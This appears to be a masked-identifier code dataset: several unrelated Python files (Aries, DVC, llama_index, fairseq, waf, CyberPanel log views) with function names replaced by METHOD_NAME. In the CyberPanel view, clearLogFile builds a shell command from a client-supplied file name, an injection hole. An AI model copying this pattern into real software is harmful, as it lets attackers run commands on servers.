registry.register_message_types({TEST_MESSAGE_TYPE: object()})
request_context.injector.bind_instance(ProtocolRegistry, registry)
disclosures = Disclosures(
disclosures=[
{
"id": DIDCommPrefix.qualify_current("basicmessage/1.0/message"),
"feature-type": "protocol",
"roles": [],
},
{"feature-type": "goal-code", "id": "aries.sell.goods.consumer"},
]
)
test_queries = [
QueryItem(
feature_type="protocol", match="https://didcomm.org/tictactoe/1.*"
),
QueryItem(feature_type="goal-code", match="aries.*"),
]
queries = Queries(queries=test_queries)
discovery_record = V20DiscoveryExchangeRecord(
connection_id="test123",
thread_id="test123",
queries_msg=queries,
)
disclosures.assign_thread_id("test123")
request_context.message = disclosures
handler = DisclosuresHandler()
mock_responder = MockResponder()
with async_mock.patch.object(
V20DiscoveryExchangeRecord,
"retrieve_by_id",
async_mock.CoroutineMock(side_effect=StorageNotFoundError),
) as mock_get_rec_thread_id, async_mock.patch.object(
V20DiscoveryExchangeRecord,
"retrieve_by_connection_id",
async_mock.CoroutineMock(return_value=discovery_record),
) as mock_get_rec_conn_id:
await handler.handle(request_context, mock_responder)
assert not mock_responder.messages
@pytest.mark.asyncio
async def test_disclosures_no_conn_id_no_thid(self, request_context):
registry = ProtocolRegistry()
registry.register_message_types({TEST_MESSAGE_TYPE: object()})
request_context.injector.bind_instance(ProtocolRegistry, registry)
disclosures = Disclosures(
disclosures=[
{
"id": DIDCommPrefix.qualify_current("basicmessage/1.0/message"),
"feature-type": "protocol",
"roles": [],
},
{"feature-type": "goal-code", "id": "aries.sell.goods.consumer"},
]
)
test_queries = [
QueryItem(
feature_type="protocol", match="https://didcomm.org/tictactoe/1.*"
),
QueryItem(feature_type="goal-code", match="aries.*"),
]
disclosures.assign_thread_id("test123")
request_context.message = disclosures
handler = DisclosuresHandler()
mock_responder = MockResponder()
with async_mock.patch.object(
V20DiscoveryExchangeRecord,
"retrieve_by_id",
async_mock.CoroutineMock(side_effect=StorageNotFoundError),
) as mock_get_rec_thread_id, async_mock.patch.object(
V20DiscoveryExchangeRecord,
"retrieve_by_connection_id",
async_mock.CoroutineMock(side_effect=StorageNotFoundError),
) as mock_get_rec_conn_id:
await handler.handle(request_context, mock_responder)
assert not mock_responder.messages
@pytest.mark.asyncio
async def test_disclose_connection_not_ready(self, request_context):
request_context.connection_ready = False
disclosures = Disclosures(
disclosures=[
{
"id": DIDCommPrefix.qualify_current("basicmessage/1.0/message"),
"feature-type": "protocol",
"roles": [],
},
{"feature-type": "goal-code", "id": "aries.sell.goods.consumer"},
]
)
disclosures.assign_thread_id("test123")
request_context.message = disclosures
handler = DisclosuresHandler()
mock_responder = MockResponder()
with pytest.raises(HandlerException):
await handler.handle(request_context, mock_responder) |
298,456 | db session | """
Tests for search views.
These tests verify the structure of the views, but don't actually test for whether the
views are returning expected results (at this time). Proper search testing requires a
corpus of searchable data in fixtures.
"""
# pylint: disable=redefined-outer-name
from typing import cast
import pytest
from flask import url_for
from funnel.models import Query
from funnel.views.search import (
SearchInAccountProvider,
SearchInProjectProvider,
get_tsquery,
search_counts,
search_providers,
)
search_all_types = list(search_providers.keys())
search_profile_types = [
k for k, v in search_providers.items() if isinstance(v, SearchInAccountProvider)
]
search_project_types = [
k for k, v in search_providers.items() if isinstance(v, SearchInProjectProvider)
]
@pytest.fixture()
def METHOD_NAME(db_session_truncate):
"""
Use the database session truncate fixture.
The default rollback fixture is not compatible with Flask-Executor, which is used
in the search methods to parallelize tasks.
"""
return db_session_truncate
# --- Tests for datatypes returned by search providers ---------------------------------
@pytest.mark.parametrize('stype', search_all_types)
def test_search_all_count_returns_int(stype, all_fixtures) -> None:
"""Assert that all_count() returns an int."""
assert isinstance(search_providers[stype].all_count(get_tsquery("test")), int)
@pytest.mark.parametrize('stype', search_profile_types)
def test_search_profile_count_returns_int(stype, org_ankhmorpork, all_fixtures) -> None:
"""Assert that profile_count() returns an int."""
assert isinstance(
cast(SearchInAccountProvider, search_providers[stype]).account_count(
get_tsquery("test"), org_ankhmorpork
),
int,
)
@pytest.mark.parametrize('stype', search_project_types)
def test_search_project_count_returns_int(
stype, project_expo2010, all_fixtures
) -> None:
"""Assert that project_count() returns an int."""
assert isinstance(
cast(SearchInProjectProvider, search_providers[stype]).project_count(
get_tsquery("test"), project_expo2010
),
int,
)
@pytest.mark.parametrize('stype', search_all_types)
def test_search_all_returns_query(stype, all_fixtures) -> None:
"""Assert that all_query() returns a query."""
assert isinstance(search_providers[stype].all_query(get_tsquery("test")), Query)
@pytest.mark.parametrize('stype', search_profile_types)
def test_search_profile_returns_query(stype, org_ankhmorpork, all_fixtures) -> None:
"""Assert that profile_query() returns a query."""
assert isinstance(
cast(SearchInAccountProvider, search_providers[stype]).account_query(
get_tsquery("test"), org_ankhmorpork
),
Query,
)
@pytest.mark.parametrize('stype', search_project_types)
def test_search_project_returns_query(stype, project_expo2010, all_fixtures) -> None:
"""Assert that project_query() returns an int."""
assert isinstance(
cast(SearchInProjectProvider, search_providers[stype]).project_query(
get_tsquery("test"), project_expo2010
),
Query,
)
# --- Test search functions ------------------------------------------------------------
@pytest.mark.usefixtures('request_context', 'all_fixtures')
def test_search_counts(org_ankhmorpork, project_expo2010) -> None:
"""Test that search_counts returns a list of dicts."""
r1 = search_counts(get_tsquery("test"))
r2 = search_counts(get_tsquery("test"), account=org_ankhmorpork)
r3 = search_counts(get_tsquery("test"), project=project_expo2010)
for resultset in (r1, r2, r3):
assert isinstance(resultset, list)
for typeset in resultset:
assert 'type' in typeset
assert 'label' in typeset
assert 'count' in typeset
# --- Test views -----------------------------------------------------------------------
@pytest.mark.usefixtures('app_context', 'all_fixtures')
def test_view_search_counts(app, client, org_ankhmorpork, project_expo2010) -> None:
"""Search views return counts as a list of dicts."""
org_ankhmorpork.make_profile_public()
r1 = client.get(
url_for('search'),
query_string={'q': "test"},
headers={'Accept': 'application/json'},
).get_json()
r2 = client.get(
org_ankhmorpork.url_for('search'),
query_string={'q': "test"},
headers={'Accept': 'application/json'},
).get_json()
r3 = client.get(
project_expo2010.url_for('search'),
query_string={'q': "test"},
headers={'Accept': 'application/json'},
).get_json()
for resultset in (r1, r2, r3):
assert isinstance(resultset, dict)
assert 'counts' in resultset
for countset in resultset['counts']:
assert 'type' in countset
assert 'label' in countset
assert 'count' in countset
@pytest.mark.usefixtures('app_context', 'all_fixtures')
@pytest.mark.parametrize('stype', search_all_types)
def test_view_search_results_all(client, stype) -> None:
"""Global search view returns results for each type."""
resultset = client.get(
url_for('search'),
query_string={'q': "test", 'type': stype},
headers={'Accept': 'application/json'},
).get_json()
assert isinstance(resultset, dict)
assert 'counts' in resultset
for countset in resultset['counts']:
assert 'type' in countset
assert 'label' in countset
assert 'count' in countset
assert 'results' in resultset
@pytest.mark.usefixtures('app_context', 'all_fixtures')
@pytest.mark.parametrize('stype', search_profile_types)
def test_view_search_results_profile(client, org_ankhmorpork, stype) -> None:
"""Account search view returns results for each type."""
org_ankhmorpork.make_profile_public()
resultset = client.get(
org_ankhmorpork.url_for('search'),
query_string={'q': "test", 'type': stype},
headers={'Accept': 'application/json'},
).get_json()
assert isinstance(resultset, dict)
assert 'counts' in resultset
for countset in resultset['counts']:
assert 'type' in countset
assert 'label' in countset
assert 'count' in countset
assert 'results' in resultset
@pytest.mark.usefixtures('app_context', 'all_fixtures')
@pytest.mark.parametrize('stype', search_project_types)
def test_view_search_results_project(client, project_expo2010, stype) -> None:
"""Project search view returns results for each type."""
resultset = client.get(
project_expo2010.url_for('search'),
query_string={'q': "test", 'type': stype},
headers={'Accept': 'application/json'},
).get_json()
assert isinstance(resultset, dict)
assert 'counts' in resultset
for countset in resultset['counts']:
assert 'type' in countset
assert 'label' in countset
assert 'count' in countset
assert 'results' in resultset |
298,457 | access logs | # -*- coding: utf-8 -*-
from django.http import HttpResponse
import json
import plogical.CyberCPLogFileWriter as logging
from plogical.httpProc import httpProc
from plogical.installUtilities import installUtilities
from plogical.virtualHostUtilities import virtualHostUtilities
from plogical.acl import ACLManager
from plogical.processUtilities import ProcessUtilities
import os
# Create your views here.
def logsHome(request):
proc = httpProc(request, 'serverLogs/index.html',
None, 'admin')
return proc.render()
def METHOD_NAME(request):
proc = httpProc(request, 'serverLogs/accessLogs.html',
None, 'admin')
return proc.render()
def errorLogs(request):
proc = httpProc(request, 'serverLogs/errorLogs.html',
None, 'admin')
return proc.render()
def ftplogs(request):
proc = httpProc(request, 'serverLogs/ftplogs.html',
None, 'admin')
return proc.render()
def emailLogs(request):
proc = httpProc(request, 'serverLogs/emailLogs.html',
None, 'admin')
return proc.render()
def modSecAuditLogs(request):
proc = httpProc(request, 'serverLogs/modSecAuditLog.html',
None, 'admin')
return proc.render()
def getLogsFromFile(request):
try:
userID = request.session['userID']
currentACL = ACLManager.loadedACL(userID)
if currentACL['admin'] == 1:
pass
else:
return ACLManager.loadErrorJson('logstatus', 0)
data = json.loads(request.body)
type = data['type']
if type == "access":
fileName = installUtilities.Server_root_path + "/logs/access.log"
elif type == "error":
fileName = installUtilities.Server_root_path + "/logs/error.log"
elif type == "email":
if ProcessUtilities.decideDistro() == ProcessUtilities.centos or ProcessUtilities.decideDistro() == ProcessUtilities.cent8:
fileName = "/var/log/maillog"
else:
fileName = "/var/log/mail.log"
elif type == "ftp":
if ProcessUtilities.decideDistro() == ProcessUtilities.centos or ProcessUtilities.decideDistro() == ProcessUtilities.cent8:
fileName = "/var/log/messages"
else:
fileName = "/var/log/syslog"
elif type == "modSec":
fileName = "/usr/local/lsws/logs/auditmodsec.log"
elif type == "cyberpanel":
fileName = "/home/cyberpanel/error-logs.txt"
try:
command = "sudo tail -50 " + fileName
fewLinesOfLogFile = ProcessUtilities.outputExecutioner(command)
status = {"status": 1, "logstatus": 1, "logsdata": fewLinesOfLogFile}
final_json = json.dumps(status)
return HttpResponse(final_json)
except:
status = {"status": 1, "logstatus": 1, "logsdata": 'Emtpy File.'}
final_json = json.dumps(status)
return HttpResponse(final_json)
except KeyError as msg:
status = {"status": 0, "logstatus":0,"error":"Could not fetch data from log file, please see CyberCP main log file through command line."}
logging.CyberCPLogFileWriter.writeToFile(str(msg) + "[getLogsFromFile]")
final_json = json.dumps(status)
return HttpResponse(final_json)
def clearLogFile(request):
try:
userID = request.session['userID']
currentACL = ACLManager.loadedACL(userID)
if currentACL['admin'] == 1:
pass
else:
return ACLManager.loadErrorJson('cleanStatus', 0)
try:
if request.method == 'POST':
data = json.loads(request.body)
fileName = data['fileName']
execPath = "/usr/local/CyberCP/bin/python " + virtualHostUtilities.cyberPanel + "/plogical/serverLogs.py"
execPath = execPath + " cleanLogFile --fileName " + fileName
output = ProcessUtilities.outputExecutioner(execPath)
if output.find("1,None") > -1:
data_ret = {'cleanStatus': 1, 'error_message': "None"}
json_data = json.dumps(data_ret)
return HttpResponse(json_data)
else:
data_ret = {'cleanStatus': 0, 'error_message': output}
json_data = json.dumps(data_ret)
return HttpResponse(json_data)
except BaseException as msg:
data_ret = {'cleanStatus': 0, 'error_message': str(msg)}
json_data = json.dumps(data_ret)
return HttpResponse(json_data)
except KeyError as msg:
logging.CyberCPLogFileWriter.writeToFile(str(msg))
data_ret = {'cleanStatus': 0, 'error_message': str(msg)}
json_data = json.dumps(data_ret)
return HttpResponse(json_data)
def serverMail(request):
smtpPath = '/home/cyberpanel/smtpDetails'
data = {}
if os.path.exists(smtpPath):
mailSettings = json.loads(open(smtpPath, 'r').read())
data['smtpHost'] = mailSettings['smtpHost']
data['smtpPort'] = mailSettings['smtpPort']
data['smtpUserName'] = mailSettings['smtpUserName']
data['smtpPassword'] = mailSettings['smtpPassword']
proc = httpProc(request, 'serverLogs/serverMail.html',
data, 'admin')
return proc.render()
def saveSMTPSettings(request):
try:
userID = request.session['userID']
currentACL = ACLManager.loadedACL(userID)
if currentACL['admin'] == 1:
pass
else:
return ACLManager.loadErrorJson('logstatus', 0)
data = json.loads(request.body)
mailer = data['mailer']
smtpPath = '/home/cyberpanel/smtpDetails'
if mailer != 'SMTP':
if os.path.exists(smtpPath):
os.remove(smtpPath)
else:
import smtplib
smtpHost = data['smtpHost']
smtpPort = data['smtpPort']
smtpUserName = data['smtpUserName']
smtpPassword = data['smtpPassword']
try:
verifyLogin = smtplib.SMTP(str(smtpHost), int(smtpPort))
if int(smtpPort) == 587:
verifyLogin.starttls()
verifyLogin.login(str(smtpUserName), str(smtpPassword))
writeToFile = open(smtpPath, 'w')
writeToFile.write(json.dumps(data))
writeToFile.close()
command = 'chmod 600 %s' % (smtpPath)
ProcessUtilities.executioner(command)
except smtplib.SMTPHeloError:
data_ret = {"status": 0, 'error_message': 'The server did not reply properly to the HELO greeting.'}
json_data = json.dumps(data_ret)
return HttpResponse(json_data)
except smtplib.SMTPAuthenticationError:
data_ret = {"status": 0, 'error_message': 'Username and password combination not accepted.'}
json_data = json.dumps(data_ret)
return HttpResponse(json_data)
except smtplib.SMTPException:
data_ret = {"status": 0, 'error_message': 'No suitable authentication method was found.'}
json_data = json.dumps(data_ret)
return HttpResponse(json_data)
status = {"status": 1}
final_json = json.dumps(status)
return HttpResponse(final_json)
except BaseException as msg:
status = {"status": 0, 'error_message': str(msg)}
final_json = json.dumps(status)
return HttpResponse(final_json) |
298,458 | test pipeline params | import operator
from functools import reduce
import pytest
from dvc.repo import Repo
from dvc.repo.stage import PROJECT_FILE
from dvc.utils.serialize import YAMLFileCorruptedError
def test_show_empty(dvc):
assert dvc.params.show() == {}
def test_show(tmp_dir, dvc):
tmp_dir.gen("params.yaml", "foo: bar")
dvc.run(cmd="echo params.yaml", params=["foo"], name="echo-params")
assert dvc.params.show() == {
"": {"data": {"params.yaml": {"data": {"foo": "bar"}}}}
}
def test_show_targets(tmp_dir, dvc):
tmp_dir.gen("params.yaml", "foo: bar")
dvc.run(cmd="echo params.yaml", params=["foo"], name="echo-params")
expected = {"": {"data": {"params.yaml": {"data": {"foo": "bar"}}}}}
assert dvc.params.show(targets=["params.yaml"]) == expected
assert dvc.params.show(targets=(tmp_dir / "params.yaml").fs_path) == expected
def test_show_toml(tmp_dir, dvc):
tmp_dir.gen("params.toml", "[foo]\nbar = 42\nbaz = [1, 2]\n")
dvc.run(cmd="echo params.toml", params=["params.toml:foo"], name="echo-params")
assert dvc.params.show() == {
"": {"data": {"params.toml": {"data": {"foo": {"bar": 42, "baz": [1, 2]}}}}}
}
def test_show_py(tmp_dir, dvc):
tmp_dir.gen(
"params.py",
"CONST = 1\nIS_DIR: bool = True\n\n\nclass Config:\n foo = 42\n",
)
dvc.run(
cmd="echo params.py",
params=["params.py:CONST,IS_DIR,Config.foo"],
name="echo-params",
)
assert dvc.params.show() == {
"": {
"data": {
"params.py": {
"data": {"CONST": 1, "Config": {"foo": 42}, "IS_DIR": True}
}
}
}
}
def test_show_multiple(tmp_dir, dvc):
tmp_dir.gen("params.yaml", "foo: bar\nbaz: qux\n")
dvc.run(cmd="echo params.yaml", params=["foo"], name="echo-params1")
dvc.run(cmd="echo params.yaml", params=["baz"], name="echo-params2")
assert dvc.params.show() == {
"": {"data": {"params.yaml": {"data": {"baz": "qux", "foo": "bar"}}}}
}
def test_show_list(tmp_dir, dvc):
tmp_dir.gen("params.yaml", "foo:\n- bar\n- baz\n")
dvc.run(cmd="echo params.yaml", params=["foo"], name="echo-params")
assert dvc.params.show() == {
"": {"data": {"params.yaml": {"data": {"foo": ["bar", "baz"]}}}}
}
def test_show_branch(tmp_dir, scm, dvc):
tmp_dir.gen("params.yaml", "foo: bar")
dvc.run(cmd="echo params.yaml", params=["foo"], name="echo-params")
scm.add(["params.yaml", "Dvcfile"])
scm.commit("init")
with tmp_dir.branch("branch", new=True):
tmp_dir.scm_gen("params.yaml", "foo: baz", commit="branch")
assert dvc.params.show(revs=["branch"]) == {
"branch": {"data": {"params.yaml": {"data": {"foo": "baz"}}}},
"workspace": {"data": {"params.yaml": {"data": {"foo": "bar"}}}},
}
def METHOD_NAME(tmp_dir, scm, dvc, run_copy):
tmp_dir.gen({"foo": "foo", "params.yaml": "foo: bar\nxyz: val\nabc: ignore"})
run_copy("foo", "bar", name="copy-foo-bar", params=["foo,xyz"])
scm.add(["params.yaml", PROJECT_FILE])
scm.commit("add stage")
tmp_dir.scm_gen("params.yaml", "foo: baz\nxyz: val\nabc: ignore", commit="baz")
tmp_dir.scm_gen("params.yaml", "foo: qux\nxyz: val\nabc: ignore", commit="qux")
assert dvc.params.show(revs=["master"], deps=True) == {
"master": {"data": {"params.yaml": {"data": {"foo": "qux", "xyz": "val"}}}}
}
assert dvc.params.show(revs=["master"]) == {
"master": {
"data": {
"params.yaml": {"data": {"abc": "ignore", "foo": "qux", "xyz": "val"}}
}
}
}
def test_show_no_repo(tmp_dir):
tmp_dir.gen({"foo": "foo", "params_file.yaml": "foo: bar\nxyz: val"})
dvc = Repo(uninitialized=True)
assert dvc.params.show(targets=["params_file.yaml"]) == {
"": {"data": {"params_file.yaml": {"data": {"foo": "bar", "xyz": "val"}}}}
}
@pytest.mark.parametrize(
"file,error_path",
(
(PROJECT_FILE, ["v1", "error"]),
("params_other.yaml", ["v1", "data", "params_other.yaml", "error"]),
),
)
def test_log_errors(tmp_dir, scm, dvc, capsys, file, error_path):
tmp_dir.gen("params_other.yaml", "foo: bar")
dvc.run(
cmd="echo params_other.yaml",
params=["params_other.yaml:foo"],
name="train",
)
rename = (tmp_dir / file).read_text()
with open(tmp_dir / file, "a", encoding="utf-8") as fd:
fd.write("\nmalformed!")
scm.add([PROJECT_FILE, "params_other.yaml"])
scm.commit("init")
scm.tag("v1")
(tmp_dir / file).write_text(rename)
result = dvc.params.show(revs=["v1"])
_, error = capsys.readouterr()
assert isinstance(
reduce(operator.getitem, error_path, result), YAMLFileCorruptedError
)
assert "DVC failed to load some parameters for following revisions: 'v1'." in error
@pytest.mark.parametrize("file", ["params.yaml", "other_params.yaml"])
def test_show_without_targets_specified(tmp_dir, dvc, scm, file):
params_file = tmp_dir / file
data = {"foo": {"bar": "bar"}, "x": "0"}
params_file.dump(data)
dvc.stage.add(
name="test",
cmd=f"echo {file}",
params=[{file: None}],
)
assert dvc.params.show() == {"": {"data": {file: {"data": data}}}}
def test_deps_multi_stage(tmp_dir, scm, dvc, run_copy):
tmp_dir.gen({"foo": "foo", "params.yaml": "foo: bar\nxyz: val\nabc: ignore"})
run_copy("foo", "bar", name="copy-foo-bar", params=["foo"])
run_copy("foo", "bar1", name="copy-foo-bar-1", params=["xyz"])
scm.add(["params.yaml", PROJECT_FILE])
scm.commit("add stage")
assert dvc.params.show(revs=["master"], deps=True) == {
"master": {"data": {"params.yaml": {"data": {"foo": "bar", "xyz": "val"}}}}
}
def test_deps_with_targets(tmp_dir, scm, dvc, run_copy):
tmp_dir.gen({"foo": "foo", "params.yaml": "foo: bar\nxyz: val\nabc: ignore"})
run_copy("foo", "bar", name="copy-foo-bar", params=["foo"])
run_copy("foo", "bar1", name="copy-foo-bar-1", params=["xyz"])
scm.add(["params.yaml", PROJECT_FILE])
scm.commit("add stage")
assert dvc.params.show(targets=["params.yaml"], deps=True) == {
"": {"data": {"params.yaml": {"data": {"foo": "bar", "xyz": "val"}}}}
}
def test_deps_with_bad_target(tmp_dir, scm, dvc, run_copy):
tmp_dir.gen(
{
"foo": "foo",
"foobar": "",
"params.yaml": "foo: bar\nxyz: val\nabc: ignore",
}
)
run_copy("foo", "bar", name="copy-foo-bar", params=["foo"])
run_copy("foo", "bar1", name="copy-foo-bar-1", params=["xyz"])
scm.add(["params.yaml", PROJECT_FILE])
scm.commit("add stage")
assert dvc.params.show(targets=["foobar"], deps=True) == {} |
298,459 | from defaults | """Router retriever."""
import logging
from typing import List, Optional, Sequence
import asyncio
from llama_index.schema import NodeWithScore
from llama_index.callbacks.schema import CBEventType, EventPayload
from llama_index.indices.base_retriever import BaseRetriever
from llama_index.indices.query.schema import QueryBundle
from llama_index.indices.service_context import ServiceContext
from llama_index.selectors.utils import get_selector_from_context
from llama_index.selectors.types import BaseSelector
from llama_index.tools.retriever_tool import RetrieverTool
logger = logging.getLogger(__name__)
class RouterRetriever(BaseRetriever):
"""Router retriever.
Selects one (or multiple) out of several candidate retrievers to execute a query.
Args:
selector (BaseSelector): A selector that chooses one out of many options based
on each candidate's metadata and query.
retriever_tools (Sequence[RetrieverTool]): A sequence of candidate
retrievers. They must be wrapped as tools to expose metadata to
the selector.
service_context (Optional[ServiceContext]): A service context.
"""
def __init__(
self,
selector: BaseSelector,
retriever_tools: Sequence[RetrieverTool],
service_context: Optional[ServiceContext] = None,
) -> None:
self.service_context = service_context or ServiceContext.METHOD_NAME()
self._selector = selector
self._retrievers: List[BaseRetriever] = [x.retriever for x in retriever_tools]
self._metadatas = [x.metadata for x in retriever_tools]
self.callback_manager = self.service_context.callback_manager
@classmethod
def METHOD_NAME(
cls,
retriever_tools: Sequence[RetrieverTool],
service_context: Optional[ServiceContext] = None,
selector: Optional[BaseSelector] = None,
select_multi: bool = False,
) -> "RouterRetriever":
selector = selector or get_selector_from_context(
service_context or ServiceContext.METHOD_NAME(), is_multi=select_multi
)
return cls(
selector,
retriever_tools,
service_context=service_context,
)
def _retrieve(self, query_bundle: QueryBundle) -> List[NodeWithScore]:
with self.callback_manager.event(
CBEventType.RETRIEVE,
payload={EventPayload.QUERY_STR: query_bundle.query_str},
) as query_event:
result = self._selector.select(self._metadatas, query_bundle)
if len(result.inds) > 1:
retrieved_results = {}
for i, engine_ind in enumerate(result.inds):
logger.info(
f"Selecting retriever {engine_ind}: " f"{result.reasons[i]}."
)
selected_retriever = self._retrievers[engine_ind]
cur_results = selected_retriever.retrieve(query_bundle)
retrieved_results.update({n.node.node_id: n for n in cur_results})
else:
try:
selected_retriever = self._retrievers[result.ind]
logger.info(f"Selecting retriever {result.ind}: {result.reason}.")
except ValueError as e:
raise ValueError("Failed to select retriever") from e
cur_results = selected_retriever.retrieve(query_bundle)
retrieved_results = {n.node.node_id: n for n in cur_results}
query_event.on_end(payload={EventPayload.NODES: retrieved_results})
return list(retrieved_results.values())
async def _aretrieve(self, query_bundle: QueryBundle) -> List[NodeWithScore]:
with self.callback_manager.event(
CBEventType.RETRIEVE,
payload={EventPayload.QUERY_STR: query_bundle.query_str},
) as query_event:
result = await self._selector.aselect(self._metadatas, query_bundle)
if len(result.inds) > 1:
retrieved_results = {}
tasks = []
for i, engine_ind in enumerate(result.inds):
logger.info(
f"Selecting retriever {engine_ind}: " f"{result.reasons[i]}."
)
selected_retriever = self._retrievers[engine_ind]
tasks.append(selected_retriever.aretrieve(query_bundle))
results_of_results = await asyncio.gather(*tasks)
cur_results = [
item for sublist in results_of_results for item in sublist
]
retrieved_results.update({n.node.node_id: n for n in cur_results})
else:
try:
selected_retriever = self._retrievers[result.ind]
logger.info(f"Selecting retriever {result.ind}: {result.reason}.")
except ValueError as e:
raise ValueError("Failed to select retriever") from e
cur_results = await selected_retriever.aretrieve(query_bundle)
retrieved_results = {n.node.node_id: n for n in cur_results}
query_event.on_end(payload={EventPayload.NODES: retrieved_results})
return list(retrieved_results.values()) |
298,460 | spacy tokenizer | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from collections import Counter
from typing import List
import torch
def align_bpe_to_words(roberta, bpe_tokens: torch.LongTensor, other_tokens: List[str]):
"""
Helper to align GPT-2 BPE to other tokenization formats (e.g., spaCy).
Args:
roberta (RobertaHubInterface): RoBERTa instance
bpe_tokens (torch.LongTensor): GPT-2 BPE tokens of shape `(T_bpe)`
other_tokens (List[str]): other tokens of shape `(T_words)`
Returns:
List[str]: mapping from *other_tokens* to corresponding *bpe_tokens*.
"""
assert bpe_tokens.dim() == 1
assert bpe_tokens[0] == 0
def clean(text):
return text.strip()
# remove whitespaces to simplify alignment
bpe_tokens = [roberta.task.source_dictionary.string([x]) for x in bpe_tokens]
bpe_tokens = [clean(roberta.bpe.decode(x) if x not in {'<s>', ''} else x) for x in bpe_tokens]
other_tokens = [clean(str(o)) for o in other_tokens]
# strip leading <s>
bpe_tokens = bpe_tokens[1:]
assert ''.join(bpe_tokens) == ''.join(other_tokens)
# create alignment from every word to a list of BPE tokens
alignment = []
bpe_toks = filter(lambda item: item[1] != '', enumerate(bpe_tokens, start=1))
j, bpe_tok = next(bpe_toks)
for other_tok in other_tokens:
bpe_indices = []
while True:
if other_tok.startswith(bpe_tok):
bpe_indices.append(j)
other_tok = other_tok[len(bpe_tok):]
try:
j, bpe_tok = next(bpe_toks)
except StopIteration:
j, bpe_tok = None, None
elif bpe_tok.startswith(other_tok):
# other_tok spans multiple BPE tokens
bpe_indices.append(j)
bpe_tok = bpe_tok[len(other_tok):]
other_tok = ''
else:
raise Exception('Cannot align "{}" and "{}"'.format(other_tok, bpe_tok))
if other_tok == '':
break
assert len(bpe_indices) > 0
alignment.append(bpe_indices)
assert len(alignment) == len(other_tokens)
return alignment
def align_features_to_words(roberta, features, alignment):
"""
Align given features to words.
Args:
roberta (RobertaHubInterface): RoBERTa instance
features (torch.Tensor): features to align of shape `(T_bpe x C)`
alignment: alignment between BPE tokens and words returned by
func:`align_bpe_to_words`.
"""
assert features.dim() == 2
bpe_counts = Counter(j for bpe_indices in alignment for j in bpe_indices)
assert bpe_counts[0] == 0 # <s> shouldn't be aligned
denom = features.new([bpe_counts.get(j, 1) for j in range(len(features))])
weighted_features = features / denom.unsqueeze(-1)
output = [weighted_features[0]]
largest_j = -1
for bpe_indices in alignment:
output.append(weighted_features[bpe_indices].sum(dim=0))
largest_j = max(largest_j, *bpe_indices)
for j in range(largest_j + 1, len(features)):
output.append(weighted_features[j])
output = torch.stack(output)
assert torch.all(torch.abs(output.sum(dim=0) - features.sum(dim=0)) < 1e-4)
return output
def spacy_nlp():
if getattr(spacy_nlp, '_nlp', None) is None:
try:
from spacy.lang.en import English
spacy_nlp._nlp = English()
except ImportError:
raise ImportError('Please install spacy with: pip install spacy')
return spacy_nlp._nlp
def METHOD_NAME():
if getattr(METHOD_NAME, '_tokenizer', None) is None:
try:
nlp = spacy_nlp()
METHOD_NAME._tokenizer = nlp.Defaults.create_tokenizer(nlp)
except ImportError:
raise ImportError('Please install spacy with: pip install spacy')
return METHOD_NAME._tokenizer |
298,461 | remove makefile rule lhs | #!/usr/bin/env python
# encoding: utf-8
# Thomas Nagy, 2008-2010 (ita)
"""
Execute the tasks with gcc -MD, read the dependencies from the .d file
and prepare the dependency calculation for the next run.
This affects the cxx class, so make sure to load Qt5 after this tool.
Usage::
def options(opt):
opt.load('compiler_cxx')
def configure(conf):
conf.load('compiler_cxx gccdeps')
"""
import os, re, threading
from waflib import Task, Logs, Utils, Errors
from waflib.Tools import c_preproc
from waflib.TaskGen import before_method, feature
lock = threading.Lock()
gccdeps_flags = ['-MD']
if not c_preproc.go_absolute:
gccdeps_flags = ['-MMD']
# Third-party tools are allowed to add extra names in here with append()
supported_compilers = ['gcc', 'icc', 'clang']
def scan(self):
if not self.__class__.__name__ in self.env.ENABLE_GCCDEPS:
return super(self.derived_gccdeps, self).scan()
nodes = self.generator.bld.node_deps.get(self.uid(), [])
names = []
return (nodes, names)
re_o = re.compile(r"\.o$")
re_splitter = re.compile(r'(?<!\\)\s+') # split by space, except when spaces are escaped
def METHOD_NAME(line):
# Splitting on a plain colon would accidentally match inside a
# Windows absolute-path filename, so we must search for a colon
# followed by whitespace to find the divider between LHS and RHS
# of the Makefile rule.
rulesep = ': '
sep_idx = line.find(rulesep)
if sep_idx >= 0:
return line[sep_idx + 2:]
else:
return line
def path_to_node(base_node, path, cached_nodes):
# Take the base node and the path and return a node
# Results are cached because searching the node tree is expensive
# The following code is executed by threads, it is not safe, so a lock is needed...
if getattr(path, '__hash__'):
node_lookup_key = (base_node, path)
else:
# Not hashable, assume it is a list and join into a string
node_lookup_key = (base_node, os.path.sep.join(path))
try:
lock.acquire()
node = cached_nodes[node_lookup_key]
except KeyError:
node = base_node.find_resource(path)
cached_nodes[node_lookup_key] = node
finally:
lock.release()
return node
def post_run(self):
if not self.__class__.__name__ in self.env.ENABLE_GCCDEPS:
return super(self.derived_gccdeps, self).post_run()
name = self.outputs[0].abspath()
name = re_o.sub('.d', name)
try:
txt = Utils.readf(name)
except EnvironmentError:
Logs.error('Could not find a .d dependency file, are cflags/cxxflags overwritten?')
raise
#os.remove(name)
# Compilers have the choice to either output the file's dependencies
# as one large Makefile rule:
#
# /path/to/file.o: /path/to/dep1.h \
# /path/to/dep2.h \
# /path/to/dep3.h \
# ...
#
# or as many individual rules:
#
# /path/to/file.o: /path/to/dep1.h
# /path/to/file.o: /path/to/dep2.h
# /path/to/file.o: /path/to/dep3.h
# ...
#
# So the first step is to sanitize the input by stripping out the left-
# hand side of all these lines. After that, whatever remains are the
# implicit dependencies of task.outputs[0]
txt = '\n'.join([METHOD_NAME(line) for line in txt.splitlines()])
# Now join all the lines together
txt = txt.replace('\\\n', '')
val = txt.strip()
val = [x.replace('\\ ', ' ') for x in re_splitter.split(val) if x]
nodes = []
bld = self.generator.bld
# Dynamically bind to the cache
try:
cached_nodes = bld.cached_nodes
except AttributeError:
cached_nodes = bld.cached_nodes = {}
for x in val:
node = None
if os.path.isabs(x):
node = path_to_node(bld.root, x, cached_nodes)
else:
# TODO waf 1.9 - single cwd value
path = getattr(bld, 'cwdx', bld.bldnode)
# when calling find_resource, make sure the path does not contain '..'
x = [k for k in Utils.split_path(x) if k and k != '.']
while '..' in x:
idx = x.index('..')
if idx == 0:
x = x[1:]
path = path.parent
else:
del x[idx]
del x[idx-1]
node = path_to_node(path, x, cached_nodes)
if not node:
raise ValueError('could not find %r for %r' % (x, self))
if id(node) == id(self.inputs[0]):
# ignore the source file, it is already in the dependencies
# this way, successful config tests may be retrieved from the cache
continue
nodes.append(node)
